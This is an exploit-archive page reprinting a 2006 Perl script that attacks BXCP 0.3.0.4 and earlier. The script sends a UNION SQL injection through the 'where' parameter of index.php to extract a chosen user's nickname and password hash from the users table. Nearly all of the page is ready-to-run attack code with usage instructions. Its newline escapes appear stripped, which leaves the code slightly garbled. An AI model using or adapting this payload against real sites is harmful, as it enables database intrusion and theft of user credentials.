BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit
# Published : 2006-07-02
# Author : x23
# Previous Title : WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities
# Next Title : deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit

#!/usr/bin/perl

use IO::Socket;

print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)n"; }

$get = "http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

print "~ connectingn";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to Servern";
print "~ exploitingn";
print $sock "GET $get HTTP/1.1n";
print $sock "Host: $webpagen";
print $sock "Accept: */*n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4n";
print $sock "Connection: closenn";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})n/) {
     print "~ hash: $1n";
     break;
  }
}

close($sock);

# www.Syue.com [2006-07-02]